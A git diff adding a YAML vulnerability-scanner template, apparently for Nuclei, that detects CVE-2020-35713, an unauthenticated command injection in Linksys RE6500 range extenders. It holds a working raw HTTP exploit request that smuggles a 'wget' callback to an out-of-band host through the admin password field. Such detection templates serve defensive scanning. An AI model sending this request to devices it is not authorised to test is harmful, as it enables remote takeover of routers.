diff --git a/cves/2020/CVE-2020-35713.yaml b/cves/2020/CVE-2020-35713.yaml new file mode 100644 index 0000000000..d65d7e96c6 --- /dev/null +++ b/cves/2020/CVE-2020-35713.yaml @@ -0,0 +1,29 @@ +id: CVE-2020-35713 + +info: + name: Linksys RE6500 Pre-Auth RCE + author: gy741 + severity: critical + reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html + description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. + tags: cve,cve2020,linksys,rce,oob,router + +requests: + - raw: + - | + POST /goform/setSysAdm HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: keep-alive + Origin: http://{{Hostname}} + Referer: http://{{Hostname}}/login.shtml + + admuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1 + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http"